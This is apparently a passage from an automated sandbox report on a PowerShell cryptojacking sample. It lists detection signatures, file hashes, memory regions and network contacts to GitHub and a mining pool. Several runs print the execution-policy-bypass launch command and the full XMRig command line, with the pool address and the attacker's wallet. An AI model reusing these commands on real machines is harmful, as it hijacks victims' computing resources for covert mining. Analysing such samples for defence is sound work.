| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 708 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 708 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/708-0-0x00007FFE8C563000-0x00007FFE8C565000-memory.dmp
memory/708-10-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp
memory/708-9-0x00000277FC040000-0x00000277FC062000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l5ocps2o.2n2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/708-11-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp
memory/708-12-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp
memory/708-14-0x00000277FC550000-0x00000277FC562000-memory.dmp
memory/708-15-0x00000277FC420000-0x00000277FC42A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1680-46-0x00000245AD640000-0x00000245AD660000-memory.dmp
memory/1680-47-0x000002463FC00000-0x000002463FC20000-memory.dmp
memory/1680-48-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/708-49-0x00007FFE8C560000-0x00007FFE8D022000-memory.dmp
memory/708-50-0x00007FFE8C563000-0x00007FFE8C565000-memory.dmp
memory/1680-51-0x0000024640250000-0x0000024640270000-memory.dmp
memory/1680-52-0x0000024640270000-0x0000024640290000-memory.dmp
memory/1680-53-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-54-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-55-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-56-0x0000024640250000-0x0000024640270000-memory.dmp
memory/1680-57-0x0000024640270000-0x0000024640290000-memory.dmp
memory/1680-58-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-59-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-60-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-61-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-62-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-63-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-64-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-65-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-66-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-67-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-68-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-69-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-70-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-71-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-72-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-73-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-74-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-75-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-76-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-77-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-78-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-79-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-80-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-81-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-82-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-83-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-84-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-85-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-86-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-87-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-88-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-89-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-90-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-91-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-92-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-93-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-94-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-95-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-96-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-97-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-98-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-99-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-100-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-101-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-102-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-103-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-104-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-105-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-106-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-107-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-108-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-109-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-110-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-111-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-112-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-113-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-114-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-115-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
memory/1680-116-0x00007FF69A4B0000-0x00007FF69B0E3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:41
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1260 wrote to memory of 3768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1260 wrote to memory of 3768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
Files
memory/1260-0-0x00007FFDC79F3000-0x00007FFDC79F4000-memory.dmp
memory/1260-5-0x000002427DF40000-0x000002427DF62000-memory.dmp
memory/1260-8-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-9-0x000002427E5A0000-0x000002427E616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0nmop00k.hcc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1260-10-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-26-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-49-0x000002427E520000-0x000002427E532000-memory.dmp
memory/1260-62-0x000002427DFB0000-0x000002427DFBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3768-91-0x000002953BDE0000-0x000002953BE00000-memory.dmp
memory/3768-92-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-93-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/1260-94-0x00007FFDC79F3000-0x00007FFDC79F4000-memory.dmp
memory/1260-95-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-96-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/3768-97-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-98-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-99-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-100-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-101-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-102-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-103-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-104-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-105-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-106-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-107-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-108-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-109-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-110-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-111-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-112-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-113-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-114-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-115-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-116-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-117-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-118-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-119-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-120-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-121-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-122-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-123-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-124-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-125-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-126-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-127-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-128-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-129-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-130-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-131-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-132-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-133-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-134-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-135-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-136-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-137-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-138-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-139-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-140-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-141-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-142-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-143-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-144-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-145-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-146-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-147-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-148-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-149-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-150-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-151-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-152-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-153-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-154-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-155-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-156-0x00007FF609920000-0x00007FF60A553000-memory.dmp
memory/3768-157-0x00007FF609920000-0x00007FF60A553000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:42
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1766s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 400 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 400 wrote to memory of 4732 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
memory/400-0-0x00007FFE314C3000-0x00007FFE314C5000-memory.dmp
memory/400-1-0x000001A2BC0F0000-0x000001A2BC112000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yascaaha.oa1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/400-11-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp
memory/400-12-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp
memory/400-14-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp
memory/400-15-0x000001A2BC2A0000-0x000001A2BC2B2000-memory.dmp
memory/400-16-0x000001A2BC280000-0x000001A2BC28A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
